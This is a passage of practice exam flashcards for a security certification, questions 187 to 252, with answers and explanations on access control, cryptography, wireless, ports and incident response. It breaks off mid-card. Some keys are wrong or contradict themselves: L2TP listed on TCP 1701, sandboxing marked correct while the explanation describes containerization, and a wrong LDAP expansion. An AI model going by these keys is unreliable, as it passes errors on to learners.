OBJ-2.6: Email servers rely on port 25 to send emails out of the network. Port 25 must be set to OPEN or ALLOW in the firewall in order for SMTP (Simple Mail Transfer Protocol) to function properly. Port 22 is SSH, port 80 is HTTP, and port 143 is IMAP.

187
Q

Which of the following access control models enables a person who creates or owns objects to define permissions to access those objects?

Rule-based access control model
Role-based access control model
Discretionary access control model
Mandatory access control model

A

Discretionary access control model

Correct Answer:
Discretionary access control enables a user who has created or owns an object, such as a file or folder, the discretion to assign permissions for that object to anyone they choose.
Incorrect Answers:
Mandatory access control models use labels and security clearances to grant access to objects.
Rule-based access control models use a specific set of rules that control the interaction between users and objects.
Role-based access control models use defined roles with specific rights and permissions assigned to those roles to control access to objects.

188
Q

What is the biggest difference between EAP-TLS and EAP-TTLS?

EAP-TLS can use unsigned certificates; EAP-TTLS must have third-party signed certificates.

EAP-TTLS needs server and client certificates; EAP-TLS only needs server certificates.

EAP-TLS needs server and client certificates; EAP-TTLS only needs server certificates.

EAP-TTLS can use unsigned certificates; EAP-TLS must have third-party signed certificates.

A

EAP-TLS needs server and client certificates; EAP-TTLS only needs server certificates.

Correct Answer:
EAP-TLS needs server and client certificates; EAP-TTLS only needs server certificates.
Incorrect Answers:
The EAP standard does not define the use of signed or unsigned certificates, although most implementations require signed certificates.

189
Q

Which of the following types of network-connected systems can manage heating, ventilation, and air-conditioning controls?

Minicomputers
Embedded hosts
Supervisory control and data acquisition
Mainframes

A

Supervisory control and data acquisition

Correct Answer:
Supervisory control and data acquisition (SCADA) systems are used to control and manage heating, ventilation, air-conditioning, and other types of industrial and environmental systems.
Incorrect Answers:
Minicomputers are antiquated computers that performed advanced tasks in the place of mainframe systems and are no longer widely in use.
Although some SCADA systems could be embedded, embedded hosts normally refer to systems that have operating systems burned into their computer chips.
Mainframe systems normally do not control industrial types of systems, such as heating, ventilation, and air-conditioning.

190
Q

If a person knows a control exists, and this control keeps him or her from performing a malicious act, what type of control would this be classified as?

Preventative control
Compensating control
Corrective control
Deterrent control

A

Deterrent control

Correct Answer:
A deterrent control keeps someone from performing a malicious act, provided that he or she knows the control is there and is aware of the consequences for violating it.
Incorrect Answers:
The difference between a deterrent control and a preventive control is that it is necessary for a potential attacker to have knowledge of the deterrent control for it to be effective. Users do not have to have knowledge of a preventative control for it to function.
A corrective control is used to correct a condition when there is either no control at all, or when the existing control is ineffective. Normally, a corrective control is temporary until a more permanent solution is put into place.
A compensating control assists and mitigates the risk when an existing control is unable to do so.

191
Q

Risk assessment means evaluating which of the following elements? (Choose two.)

Impact
Threat
Vulnerability
Probability

A

Impact, Probability

Correct Answers:
Probability and impact values are evaluated and assessed during a risk assessment.
Incorrect Answers:
Threats and vulnerabilities do not have defined values.

192
Q

What type of file, often sent with an e-mail message, can contain malicious code that can be downloaded and executed on a client’s computer?

Cookie
Cross-site script
HTML attachment
Locally shared object

A

HTML attachment

Correct Answer:
Any form of attachment is a risk. An HTML attachment is basically an HTML file that comes attached to an e-mail message. When a user clicks this attachment, it automatically spawns a browser session and could connect to a malicious Web site. Once the user is connected to the site, malicious code can be downloaded onto the user’s browser.
Incorrect Answers:
Neither cookies, locally shared objects, nor cross-site scripts are attached to e-mail messages.

193
Q

Which of the following is a form of intentional interference with a wireless network?

SSID cloaking
MAC spoofing
Evil twin
Jamming

A

Jamming

Correct Answer:
Jamming is an intentional interference with the signal of a wireless network. It is often part of a DoS attack.
Incorrect Answers:
An evil twin attack is a rogue wireless access point set up to be nearly identical to a legitimate access point.
SSID cloaking is a weak security measure designed to hide the broadcasting of a wireless network’s service set identifier.
MAC spoofing is an attempt to impersonate another host by using its MAC address.

194
Q

Which of the following is an older form of attack where a malicious/compromised Web site places invisible controls on a page, giving users the impression they are clicking some safe item that actually is an active control for something malicious?

Buffer overflow
Man-in-the-browser
Clickjacking
Header manipulation

A

Clickjacking

Correct Answer:
Clickjacking is almost never seen anymore as it’s easy to detect this type of attack.
Incorrect Answers:
Header manipulation means adding malicious information to HTTP headers.
A man-in-the-browser attack means adding malicious information or code, often by using a Trojan horse.
Buffer overflows attempt to achieve privilege escalation by forcing a buffer to cause an error.

195
Q

Which of the following ports would be most likely to allow secure remote access into a system within a data center?

TCP port 1701
TCP port 443
UDP port 53
UDP port 123

A

TCP port 1701

Correct Answer:
L2TP aligns to TCP port 1701, allowing secure remote access to a system through a VPN connection.
Incorrect Answer:
UDP port 53 aligns to the Domain Name Service (DNS), UDP port 123 is used by Network Time Protocol (NTP) services, and TCP port 443 is used by HTTP over SSL.

196
Q

Which of the following formal management efforts is designed to remediate security flaws discovered in applications and operating systems?

Account management
Change management
Patch management
Upgrade management

A

Patch management

Correct Answer:
Patch management is the formal effort designed to remediate vulnerabilities and other software flaws on a regular basis.
Incorrect Answers:
Managing upgrades is part of a formal change and configuration management process.
Account management is the process of provisioning and maintaining user accounts on the system.
Change management is a formalized process that involves both long-term and short-term infrastructure changes, as well as configuration changes to hosts and networks.

197
Q

Which of the following types of public key cryptography uses a web of trust model?

DHE
PGP
RSA
AES

A

PGP

Correct Answer:
Pretty good privacy, or PGP, is commonly used between individuals or small groups of people, and it normally does not require a public key infrastructure. It uses a web of trust model, which means that each individual has to be able to trust every other individual who uses PGP to encrypt and decrypt data sent and received by them.
Incorrect Answers:
RSA is the de facto key generation protocol used in public key cryptography, and it is normally used in a public key infrastructure type of environment.
Diffie-Hellman Exchange (DHE) is a key negotiation and agreement protocol that is used to exchange keys and establish a secure communications session.
AES is a symmetric key protocol not used in public key cryptography.

198
Q

Which of the following is generally a script planted by a disgruntled employee or other malicious actor that is set to execute at a certain time?

Trojan horse
Logic bomb
Virus
Adware

A

Logic bomb

Correct Answer:
A logic bomb is simply a script that is set to execute at a certain time. Logic bombs are usually created by rogue administrators or disgruntled employees.
Incorrect Answers:
A virus is a piece of malicious software that must be propagated through a definite user action.
A Trojan horse is a piece of software that seems to be of value to the user, but in reality is malware.
Adware is usually annoying advertisements that come in the form of pop-up messages in a user’s browser.

199
Q

Which of the following are typically created for a single Web browsing session and are generally not carried across different sessions?

Flash cookies
Persistent cookies
Session cookies
Locally shared objects

A

Session cookies

Correct Answer:
Session cookies are used for a single Web browsing session only and are generally not carried across Web sessions.
Incorrect Answers:
Persistent cookies are saved and used between various Web sessions.
Locally shared objects, also called flash cookies, are used for Web sites that use Adobe Flash content, and they can be persistent.

200
Q

Which of the following is normally required to convert and read coded messages?

Asymmetric key
Algorithm
Codebook
Symmetric key

A

Codebook

Correct Answer:
Codes are representations of an entire phrase or sentence, where ciphers are encrypted on a character-by-character basis. A codebook is needed to translate coded phrases into their true plaintext meanings.
Incorrect Answers:
A symmetric key is used to encrypt ciphers, not codes, as are algorithms and asymmetric keys.

201
Q

An attack in which an attacker attempts to disconnect a victim’s wireless host from its access point is called a(n) __________.

Deauthentication attack
Initialization vector attack
Replay attack
Spoofing

A

Deauthentication attack

Correct Answer:
A deauthentication attack involves sending specially crafted traffic to both a wireless client and an access point, in the hope of causing them to deauthenticate from each other and disconnect.
Incorrect Answers:
A spoofing attack involves impersonating a wireless client or access point, either through its IP or MAC address.
A replay attack involves the reuse of intercepted non-secure credentials to gain access to a system or network.
Initialization vector (IV) attacks involve attempting to break WEP keys by targeting their weak IVs.

202
Q

Which of the following are true statements regarding the relationships of functionality, security, and available resources? (Choose two.)

As resources decrease, both functionality and security decrease.

As functionality increases, security increases.

As security increases, functionality decreases.

As resources increase, security decreases but functionality decreases.

A

As resources decrease, both functionality and security decrease.
As security increases, functionality decreases.

Correct Answers:
The relationship between security and functionality is inversely proportional. As one increases, the other decreases. The relationship between resources and both security and functionality is directly proportional. As resources increase, so do both functionality and security. If resources decrease, so do functionality and security.
Incorrect Answers:
If functionality increases, security generally decreases.
If resources increase, both security and functionality increase as well.

203
Q

Which of the following is a point-in-time backup of certain key configuration settings of a virtual machine, allowing the VM to be restored back to that point in time if it suffers a crash or other issue?

Differential backup
System state backup
Snapshot
Incremental backup

A

Snapshot

Correct Answer:
A snapshot is a quick backup of critical configuration files, used by the hypervisor to restore the virtual machine back to its point-in-time status should it become unstable or suffer any other issues.
Incorrect Answers:
Differential and incremental backups apply to entire systems and are used to back up only files that have changed since the last full backup.
The system state backup is a Microsoft Windows type of backup that backs up critical files used by the operating system to restore it in the event of a system crash or other issue.
Virtual machines can make use of all of these other types of backups, but they are not used by the hypervisor to restore the VM itself.

204
Q

Which of the following processes is concerned with validating credentials?

Accountability
Authorization
Auditing
Authentication

A

Authentication

Correct Answer:
Authentication is the process of validating that a user’s credentials are authentic, after the user has presented them through the identification process.
Incorrect Answers:
Authorization is the process of controlling access to resources through methods that include permissions, rights, and privileges.
Auditing is the process of reviewing logs and other audit trails to determine what actions have been performed on systems and data.
Accountability uses auditing to ensure that users are traced to and held responsible for their actions.

205
Q

What is the second step in the incident response life cycle?

Detection and analysis
Containment, eradication, and recovery
Preparation
Post-incident activity

A

Detection and analysis

Correct Answer:
Detection and analysis is the second step of the incident response life cycle.
Incorrect Answers:
In order, the steps of the incident response life cycle are preparation; detection and analysis; containment, eradication, and recovery; and post-incident activity.

206
Q

All of the following are considered duties of a first responder to an incident, except:

Notifying the incident response team

Notifying and coordinating with senior management and law enforcement officials

Secure the scene

Determining the initial scope and impact of the incident

A

Notifying and coordinating with senior management and law enforcement officials

Correct Answer:
Notifying and coordinating with senior management and law enforcement officials is normally the job of a senior leader within the incident response team.
Incorrect Answers:
The primary job of a first responder is to secure the scene. They are also responsible for notifying the incident response team and initially determining the scope, seriousness, and impact of the incident.

207
Q

Which of the following is the simplest form of disaster recovery exercise?

Walkthrough test
Full-scale test
Documentation review
Tabletop exercise

A

Documentation review

Correct Answer:
The documentation review is the simplest form of test. In this type of test, the business continuity plan, disaster recovery plan, and associated documents are reviewed by relevant personnel including managers, recovery team members, and anyone else who may have responsibilities directly affecting plans.
Incorrect Answers:
A tabletop exercise is a type of group review.
In a full-scale test, all personnel are usually involved and may actually conduct activities as they would during a real incident. This type of test is more complex and normally requires extensive resources, such as people and equipment, so it is typically conducted infrequently.
In a walkthrough test, team members go through the motions of fulfilling the responsibilities and conducting the activities required during an incident or disaster.

208
Q

Which of the following is a key agreement protocol used in public key cryptography?

SHA-2
RSA
ECDH
AES

A

ECDH

Correct Answer:
Elliptic Curve Diffie-Hellman (ECDH) is a key exchange protocol used in public key cryptography. It is used to negotiate, agree upon, and establish a secure session between two parties.
Incorrect Answers:
RSA (Rivest-Shamir-Adleman) is the most common public-private key generation algorithm used in public key cryptography. It is used to generate a public and private key pair.
AES is the Advanced Encryption Standard, and it is not used in public key cryptography; it is a symmetric key cryptography algorithm.
SHA-2 is the second iteration of the Secure Hashing Algorithm and is used to generate message digests for plaintext. It is not used in public key cryptography to exchange keys or establish secure sessions.

209
Q

Which of the following terms indicates the length of time a device is expected to last in operation, and only a single, definitive failure will occur and will require that the device be replaced rather than repaired?

Mean time to replace
Mean time to recovery
Mean time between failures
Mean time to failure

A

Mean time to failure

Correct Answer:
The mean time to failure (MTTF) is the length of time a device is expected to last in operation. In MTTF, only a single, definitive failure will occur and will require that the device be replaced rather than repaired.
Incorrect Answer:
Mean time between failures (MTBF) represents the manufacturer’s best guess (based on historical data) regarding how much time will pass between major failures of that component. This assumes that more than one failure will occur, which means that the component will be repaired, rather than replaced.
Mean time to recovery (MTTR) is the amount of time it takes for a hardware component to recover from failure.
Mean time to replace is not a valid term.

210
Q

What size WEP key did the original IEEE 802.11b specification use?

64-bit
128-bit
512-bit
256-bit

A

64-bit

Correct Answer:
WEP key sizes are 64-bit (40-bit key and 24-bit initialization vector) or 128-bit (104-bit key and 24-bit initialization vector). The 802.11b standard called for a 64-bit key.
Incorrect Answers:
Neither 512-bit nor 256-bit are valid WEP key sizes.
The original 802.11b standard called for a 64-bit key; the 128-bit key was developed after this standard was issued.

211
Q

All of the following are methods that can be used to detect unauthorized (rogue) hosts connected to the network, except:

NAC device logs
DHCP logs
MAC filtering logs
Switch logs

A

MAC filtering logs

Correct Answer:
MAC addresses can be spoofed, so examining MAC addresses in filtering logs may not provide any indication of whether a host is authorized or not.
Incorrect Answers:
The other three are valid methods of detecting rogue hosts that connect to the network.

212
Q

All of the following are supporting elements of authorization, except:

Credential validation
Principle of least privilege
Rights, permissions, and privileges
Separation of duties

A

Credential validation

Correct Answer:
Validating credentials is an important aspect of authentication, not authorization.
Incorrect Answers:
The other three elements directly support authorization.

213
Q

All of the following types of social engineering attacks might go undetected by the victim, except:

Coercion
Dumpster diving
Shoulder surfing
Tailgating

A

Coercion

Correct Answer:
Coercion attacks generally require direct confrontation with the victim, so they are usually detected.
Incorrect Answers:
The other three attacks may go undetected by the victim, because they may not require any direct interaction with the target and can be performed subtly by the attacker without the victim noticing.

214
Q

Which of the following algorithms won the U.S. government-sponsored competition to become the Advanced Encryption Standard (AES)?

Blowfish
Twofish
Rijndael
RC4

A

Rijndael

Correct Answer:
Rijndael was selected as the winner of the NIST competition and became the U.S. government’s Advanced Encryption Standard (AES).
Incorrect Answers:
Twofish, another symmetric algorithm, was one of the five finalists for the competition, but it did not win.
Blowfish is also a symmetric algorithm, but it was not considered in the competition to become the AES.
RC4 is a symmetric streaming cipher commonly seen in WEP and SSL implementations. It was not one of the finalists involved in the AES competition.

215
Q

All of the following are valid methods to secure static hosts in an organization, except:

Layered security
Network segmentation
User-dependent security
Application level firewalls

A

User-dependent security

Correct Answer:
The organization should not depend solely upon users to manage security on static devices, because these devices can be managed just as traditional hosts and network devices are.
Incorrect Answers:
The other three are all valid methods of securing static hosts in an organization.

216
Q

Which of the following DES/AES encryption modes is considered the weakest?

CTR
CBC
ECB
OFB

A

ECB

Correct Answer:
With ECB mode, a given piece of plaintext will always produce the same corresponding piece of ciphertext. This predictability makes it weak.
Incorrect Answers:
While CBC, OFB, and CTR mode go about the process in different ways, these modes lack ECB’s predictability, adding strength to the underlying cryptosystem.

217
Q

Which of the following protocols would you use to encrypt VPN traffic?

S/MIME
IPsec
SSH
MD5

A

IPsec

Correct Answer:
IPsec provides encryption, integrity, and authentication for data tunneled over VPNs across public networks.
Incorrect Answers:
S/MIME is used for encrypting e-mail.
SSH allows secure remote access.
MD5 produces hashes to allow for integrity checking.

218
Q

When information is converted to an unreadable state using cryptography, in what form is the information?

Plaintext
Ciphertext
Hash
Message digest

A

Ciphertext

Correct Answer:
Ciphertext is a result of the encryption process; it is encrypted text.
Incorrect Answers:
Plaintext is unencrypted text.
A hash or message digest is a cryptographic representation of variable length text, but it is not the text itself.

219
Q

For which of the following should employees receive training to establish how they are to treat information of differing sensitivity levels?

Protection of personally identifiable information on social media
Data disposal
Clean desk policies
Information classification

A

Information classification

Correct Answer:
An organization’s information classification policy not only outlines what level of security protections certain data receives, but it also serves to instruct employees on how to treat sensitive data.
Incorrect Answers:
Clean desk policies, which instruct employees to not leave sensitive data unattended, as well as data disposal policies, can be included in the information and data handling policies, but these are very specific instances and don’t cover all information or all scenarios where an employee would be in a position to treat data with care.
Protection of personally identifiable information on social media would be part of an organization’s social media policy.

220
Q

What size is the initialization vector (IV) for the Temporal Key Integrity Protocol (TKIP), used in the WPA standard?

128-bit
24-bit
64-bit
48-bit

A

48-bit

Correct Answer:
The IV size for TKIP is 48-bit.
Incorrect Answers:
The only valid IV size for TKIP is 48-bit.

221
Q

Which of the following authentication protocols uses a series of tickets to authenticate users to resources, as well as timestamps to prevent replay attacks?

SESAME
Kerberos
MS-CHAP
EAP

A

Kerberos

Correct Answer:
Kerberos is an authentication protocol used in Windows Active Directory. It uses a series of tickets and timestamps to authenticate individuals and prevent replay attacks.
Incorrect Answers:
MS-CHAP is a Microsoft version of the Challenge Handshake Authentication Protocol, used in earlier versions of Windows. It uses challenges and password hashes to authenticate individuals.
EAP, the Extensible Authentication Protocol, is an authentication framework that can use several other protocols for secure access across both wired and wireless networks.
SESAME (Secure European System for Applications in a Multivendor Environment) is a European-developed authentication protocol that can provide for single sign-on capability. It is not widely used and does not use tickets for authentication.

222
Q

Which of the following statements best defines the recovery point objective (RPO)?

The RPO is the maximum allowable amount of data (measured in terms of time) that the organization can afford to lose during a disaster or an incident.

The RPO is the minimum amount of data the organization is expected to lose during a disaster or an incident.

The RPO is the maximum amount of time the organization can afford to be down from normal processing.

The RPO is the maximum allowable amount of data (measured in gigabytes) that the organization can afford to lose during a disaster or an incident.

A

The RPO is the maximum allowable amount of data (measured in terms of time) that the organization can afford to lose during a disaster or an incident.

Correct Answers:
The RPO is the maximum allowable amount of data (measured in terms of time) that the organization can afford to lose during a disaster or an incident.
Incorrect Answers:
The RPO is the maximum amount of data, not the minimum, that can be lost during a disaster or an incident.
RPO refers to data that can be lost, not time itself.
RPO is measured in time, not gigabytes.

223
Q

During which stage of a secure development model would you normally find steps such as secure code review, fuzzing, and vulnerability assessments?

Security requirements
Secure implementation
Security testing
Secure design

A

Security testing

Correct Answer:
During the secure testing phase of the secure software development model, software is measured or tested against security, functional, and performance requirements. This may include secure code review, application fuzzing, and vulnerability assessments, as well as penetration testing.
Incorrect Answers:
In the secure design stage, different security functionality is designed into the application.
In the security requirements stage, requirements for different security functions are determined.
During secure implementation of software, security requirements are validated as implemented in the application.

224
Q

Which of the following secure file copy protocols is used over an SSL or TLS connection?

FTP
FTPS
SFTP
SCP

A

FTPS

Correct Answer:
FTPS is a secure version of the non-secure FTP protocol and is used over SSL or TLS connections to ensure security when transferring files to or from an Internet-based host.
Incorrect Answers:
FTP is a non-secure protocol used to copy files to and from Internet-based hosts.
SCP is a secure copy protocol used to copy files securely to and from a networked host, and it uses SSH.
SFTP is a secure file transfer protocol used to copy files to and from an Internet-based host, and it also uses SSH.

225
Q

Which of the following is a recognized way of restricting access to applications?

Whitelisting
Graylisting
Filtering
Blacklisting

A

Blacklisting

Correct Answer:
Blacklisting is a technique that involves an administrator adding undesirable or restricted software or applications to a list on content filtering devices, in group policy, or through some other type of mechanism. This ensures that users are not allowed to download, install, or execute these particular applications.
Incorrect Answers:
Whitelisting is the opposite of blacklisting; applications that users are allowed to download, install, and execute are added to a whitelist.
There is no such term as graylisting.
Filtering typically involves checking traffic on a network device based upon specific characteristics. The term normally does not apply to software or applications.

226
Q

You are trying to determine the appropriate level of high availability for a server. The server must be available on a constant basis, and downtime in a given year cannot exceed 1 hour. It normally takes you about 45 minutes to bring down and restart the server for maintenance. Which of the following reflects the level of availability you require?

99.99 percent availability
99 percent availability
99.9 percent availability
99.999 percent availability

A

99.99 percent availability

Correct Answer:
99.99 percent availability accounts for 52 minutes of downtime per year.
Incorrect Answers:
99.999 percent availability allows only 5.26 minutes of downtime per year, which may not be enough if the server requires almost an hour of maintenance time.
99.9 percent availability equates to more than 8 hours of downtime per year and exceeds the stated requirement.
99 percent availability is more than 3 days of downtime per year, far exceeding the requirement for no more than 1 hour of downtime.

227
Q

Which type of cloud service is usually operated by a third-party provider that sells or rents “pieces” of the cloud to different entities, such as small businesses or large corporations, to use as they need?

Community
External
Private
Public

A

Public

Correct Answer:
A public cloud is operated by a third-party provider who leases space in the cloud to anyone who needs it.
Incorrect Answers:
An external cloud is not a valid type of cloud and could be a public, private, or community cloud.
A private cloud is for use only by one organization and is usually hosted on that organization’s infrastructure.
A community cloud is for use by similar organizations or communities, such as universities or hospitals, that need to share common data.

228
Q

If Bobby and Dawn exchange confidential encrypted e-mail messages using public and private key pairs, which of the following keys would Bobby need to encrypt confidential data in an e-mail message sent to Dawn?

Bobby’s public key
Dawn’s public key
Bobby’s private key
Dawn’s private key

A

Dawn’s public key

Correct Answer:
To encrypt information that Dawn can decrypt, using public and private key pairs, Bobby would need Dawn’s public key to encrypt data that only her private key can decrypt.
Incorrect Answers:
Encrypting with Bobby’s public key would allow only Bobby’s private key to decrypt the data, and only he would possess that.
Bobby would not possess Dawn’s private key, and if it were used to encrypt the data, only her public key, which everyone would have, would be able to decrypt it, so there would be no confidentiality involved.
Bobby would not use his private key to encrypt data, because only his public key can decrypt it, and everyone could have that key, so no confidentiality would be assured.

229
Q

Which of the following security controls allows connectivity to a network based on the system’s hardware address?

Disabling SSID broadcast
MAC address filtering
WEP encryption
WPA2 encryption

A

MAC address filtering

Correct Answer:
Filtering by the MAC address ensures that only specific systems can access the wireless network based on the MAC address generally presented by the network card. That address is added into a list of systems that can connect (or not).
Incorrect Answers:
Encryption technologies cannot, on their own, stop specific systems from entering the network.
Disabling the SSID broadcast cannot stop systems from connecting if they determine the SSID through other means.

230
Q

How many rounds does DES perform when it encrypts plaintext?

16
32
128
64

A

16

Correct Answer:
DES uses 16 rounds of encryption.
Incorrect Answers:
DES does not use 32, 64, or 128 rounds in its encryption or decryption processes.

231
Q

Which of the following network management protocols uses agents that respond to queries to report its status to a central program manager?

SHTTP
SMTP
SSH
SNMP

A

SNMP

Correct Answers:
The Simple Network Management Protocol (SNMP) uses SNMP agents that respond to queries to report their status to a central program manager.
Incorrect Answers:
These protocols are not used to manage network devices.

232
Q

Your organization is concerned that employees might e-mail proprietary information to themselves at their private addresses. Which of the following would be most effective at catching that particular effort?

Content filter
Antispam filter
Firewall
Caching proxy server

A

Content filter

Correct Answer:
Content filters can scan content as it leaves the network, checking for certain types of content that have been pre-specified within the software.
Incorrect Answers:
The other choices are incorrect because those technologies will not content-filter messages.
Antispam filters are used to catch and quarantine spam messages.
Caching proxy servers are used to cache, or store, messages for speedy retrieval in the future.
Firewalls help control and block (when necessary) network traffic at the ingress and egress points.

233
Q

Fabian’s new load balancer has a number of scheduling options and he’s trying to decide which one to use. He wants to schedule load balancing such that the load balancer assigns to each server in order, then returns to the first server. What is this form of scheduling?

On demand
First come
Affinity
Round robin

A

Round robin

Correct Answer:
Round robin is a turn-based scheduling method where jobs are assigned to servers in sequential order.
Incorrect Answers:
Affinity scheduling means that the load balancer keeps a client’s sessions connected to the server that’s keeping the session.
On demand and First come are meaningless terms created from the depths of your test writer’s mind.

234
Q

What type of organizations are the main users of an interconnection service agreement (ISA)?

Satellite providers
Government entities
End users
Telecommunication companies

A

Telecommunication companies

Correct Answer:
Telecoms use Interconnection Service Agreements.
Incorrect Answers:
Government entities use MOUs, because contracts are not the primary method of agreement between entities of the same government, but they do not use Interconnection Service Agreements because they don’t run or manage Internet or telecom traffic.

235
Q

You have a server that is used for Domain Name System (DNS) queries. You find that it has several open ports, and you intend to close all of the unnecessary ports on the server. The server is listening on ports 22, 25, 53, and 80. Which port must be left open to continue to use DNS functionality?

80
22
25
53

A

53

Correct Answers:
DNS uses TCP and UDP port 53, so this port should be left open.
Incorrect Answers:
All other unnecessary ports should be closed.
Port 22 is used by SSH. Port 25 is used by SMTP.
Port 80 is used by HTTP.

236
Q

The corporate IT manager wants you to implement a process that separates corporate apps from personal apps on mobile devices. Which of the following techniques will enable you to do this?

Blacklisting
Whitelisting
Sandboxing
Containerization

A

Sandboxing

Correct Answer:
Sandboxing separates applications from one another and does not allow them to share execution, user, or data space.
Incorrect Answers:
Whitelisting enables an administrator to determine which applications and other software the user is allowed to install and execute.
Containerization is a technique used to separate different sensitivities of data, such as corporate and personal data on a mobile device.
Blacklisting is a method that enables administrators to restrict users from installing and executing certain applications.

237
Q

Which of the following statements best describes the relationship between the elements of risk?

Threats exploit vulnerabilities.
Threat actors create vulnerabilities in assets.
Threats cause impact to vulnerabilities.
Threat actors initiate vulnerabilities.

A

Threats exploit vulnerabilities.

Correct Answer:
Threats exploit vulnerabilities. The relationship between the elements of risk is as follows: threat actors initiate threats, which in turn exploit vulnerabilities.
Incorrect Answers:
All other answers are incorrect.

238
Q

Which of the following is the biggest risk involved in cloud computing?

Lack of accountability
Lack of availability
Lack of responsibility
Lack of control

A

Lack of control

Correct Answer:
Lack of control over data and the infrastructure is probably the greatest risk to cloud computing.
Incorrect Answers:
Accountability and responsibility can be established through effective security controls and well-written service-level agreements.
Cloud computing usually increases availability of data for users, since it is typically built on highly available, redundant infrastructures.

239
Q

Which of the following encryption protocols uses RC4 with small initialization vector sizes?

802.1X
WEP
WPA2
WPA

A

WEP

Correct Answer:
WEP is a legacy wireless encryption protocol that has been determined to be very weak and easily broken. It uses the RC4 stream cipher and weak (24-bit) initialization vectors to encrypt data on wireless networks.
Incorrect Answers:
WPA2 is an advanced encryption protocol that uses AES.
WPA was an interim protocol used to correct some of WEP’s weaknesses. It uses the TKIP protocol.
802.1X is a port-based authentication method, not a wireless encryption protocol.

240
Q

Your organization wants you to create and implement a policy that will detail proper use of its information systems during work hours. Which of the following is the best choice?

Service level agreement
Due care
Acceptable-use policy
Access control policies

A

Acceptable-use policy

Correct Answer:
An acceptable-use policy details what is (and is not) acceptable for users to do during their working hours, including personal use and unacceptable activities on the company network, such as gambling and pornography.
Incorrect Answers:
Due care is an act performed by the company itself, and is not a user policy.
Service level agreements are made between a company and a third party, such as a contractor or a supplier.
Access control policies help protect against unauthorized access, both physical and logical, but they don’t discuss how users can and cannot use systems.

241
Q

Marisol sees a tremendous amount of traffic on TCP port 389 from the Internet. Which TCP/IP service should she inspect first?

LDAP
TLS
SQL
HTTPS

A

LDAP

Correct Answer:
The Lightweight Directory Application Protocol (LDAP) uses TCP port 389.
Incorrect Answers:
SQL is a query language for directories.
HTTPS is the secure HTTP protocol for Web pages.
TLS is an authentication/encryption protocol.

242
Q

All of the following are characteristics of hashing, except:

Hashes produce fixed-length digests for variable-length text.

Hashing can be used to protect data integrity.

Hashes are decrypted using the same algorithm and key that encrypted them.

Hashes are cryptographic representations of plaintext.

A

Hashes are decrypted using the same algorithm and key that encrypted them.

Correct Answer:
Hashes are produced from one-way mathematical functions and cannot be decrypted.
Incorrect Answers:
All of these are characteristics of hashing.

243
Q

Which of the following concepts should be the most important consideration when determining how to budget properly for security controls?

Risk likelihood and impact
Qualitative costs
Threat of natural disasters
Asset identification

A

Risk likelihood and impact

Correct Answer:
The risk likelihood and impact should directly determine how much you budget for controls to prevent the occurrence of risk.
Incorrect Answers:
Asset identification does not require analysis of cost.
Risk likelihood and impact are more accurate than threat of natural disaster and qualitative costs in determining how much a solution will actually cost.

244
Q

Which type of network intrusion detection system (NIDS) develops a baseline of normal traffic so it can detect deviations in this traffic that might indicate an attack?

Signature-based system
Filter-based system
Anomaly-based system
Rule-based system

A

Anomaly-based system

Correct Answers:
Anomaly-based systems detect unusual network traffic patterns based upon a baseline of normal network traffic.
Incorrect Answers:
Rule-based systems use predefined rule sets.
Signature-based systems use predefined traffic signatures that are typically downloaded from a vendor.
Filter-based systems, such as routers and firewalls, base detection on access control lists that specify traffic that is permitted and denied.

245
Q

During which type of assessment would penetration testers not have any knowledge about the network and network defenders have no knowledge of the test itself?

Black box test
Gray box test
Double-blind test
Blind test

A

Double-blind test

Correct Answer:
In a double-blind test, testers have no prior knowledge of the network they are testing, and network defenders have no prior knowledge of the test and aren’t aware of any attacks unless they can detect and defend against them. This test is designed to test the defenders’ abilities to detect and respond to attacks and to test and exploit vulnerabilities on the network.
Incorrect Answers:
In a black box test, only the testers have no knowledge of details about this network configuration. This type of test is also referred to as a blind test.
In a gray box test, the penetration tester may have some limited knowledge of the network or systems, gained from the organization that wants the test.

246
Q

During which stage of a secure development model would you normally find steps such as requirements gathering, analysis, and diagram development?

Secure design
Secure implementation
Security testing
Security requirements

A

Security requirements

Correct Answer:
In the security requirements stage, requirements for different security functions are determined. Iterations of interviews and surveys might be conducted and gathered, and diagrams developed to show project milestones.
Incorrect Answers:
During the secure testing phase of the secure software development model, software is measured or tested against security, functional, and performance requirements. This may include secure code review, application fuzzing, and vulnerability assessments, as well as penetration testing.
In the secure design stage, different security functionality is designed into the application.
During the secure implementation of software, security requirements are validated as implemented in the application.

247
Q

Which of the following is an example of a trusted OS?

Windows 10
Windows Server
Ubuntu Linux
SELinux

A

SELinux

Correct Answer:
SELinux is the only example, from the answers given, of a trusted operating system.
Incorrect Answers:
These operating systems are not considered trusted operating systems, although they can be hardened to varying degrees.

248
Q

Which of the following is not a characteristic of effective signage?

Signage should indicate security checkpoints to report to in the event of an emergency requiring evacuation.

Signage should follow national and international standards for symbols and colors.

Signage should be placed in well-lit areas and not obstructed by large objects.

Signage should warn intruders away from restricted areas.

A

Signage should indicate security checkpoints to report to in the event of an emergency requiring evacuation.

Correct Answer:
Signage should indicate the location and route to emergency evacuation exits, not security checkpoints, in the event of an emergency requiring evacuation.
Incorrect Answers:
All of these are valid characteristics of good signage.

249
Q

All of the following are characteristics of the RADIUS authentication protocol, EXCEPT:

RADIUS encrypts user passwords during the authentication process.

RADIUS accepts earlier forms of authentication protocols, such as PAP.

RADIUS uses UDP port 1812.

RADIUS uses TCP port 1812.

A

RADIUS uses TCP port 1812.

Correct Answer:
RADIUS does not use TCP.
Incorrect Answers:
All of these are characteristics of the RADIUS protocol.

250
Q

Which of the following fire suppression chemicals was banned in 1987 and can no longer be used in data centers?

Halon
Water
Carbon dioxide
FM-200

A

Halon

Correct Answer:
Halon is a dangerous chemical that was previously used in data centers to suppress fires. However, it was banned in 1987 because it is also dangerous to human beings.
Incorrect Answers:
Water is still used to combat certain classes of fires.
Carbon dioxide is used to combat both liquid and electrical fires.
FM-200 has generally replaced Halon in data center fire suppression systems.

251
Q

Which of the following attacks might involve an attacker attempting to enter a facility with arms full of boxes, in an attempt to gain sympathy and have someone open the door for him or her?

Tailgating
Shoulder surfing
Impersonation
Dumpster diving

A

Tailgating

Correct Answer:
A tailgating person might use some sort of creative pretext to convince someone to open the door and allow him or her to enter without proper identification.
Incorrect Answers:
Neither shoulder surfing nor dumpster diving is an attempt to enter a facility.
Impersonation could be used to enter a facility, but it is not being used to do so in this case.

252
Q

Which of the following policy settings prevent a user from rapidly changing passwords and cycling through his or her password history to reuse a password?

Password history
Maximum password age
Password complexity
Minimum password age

A

Minimum password age

Correct Answer:
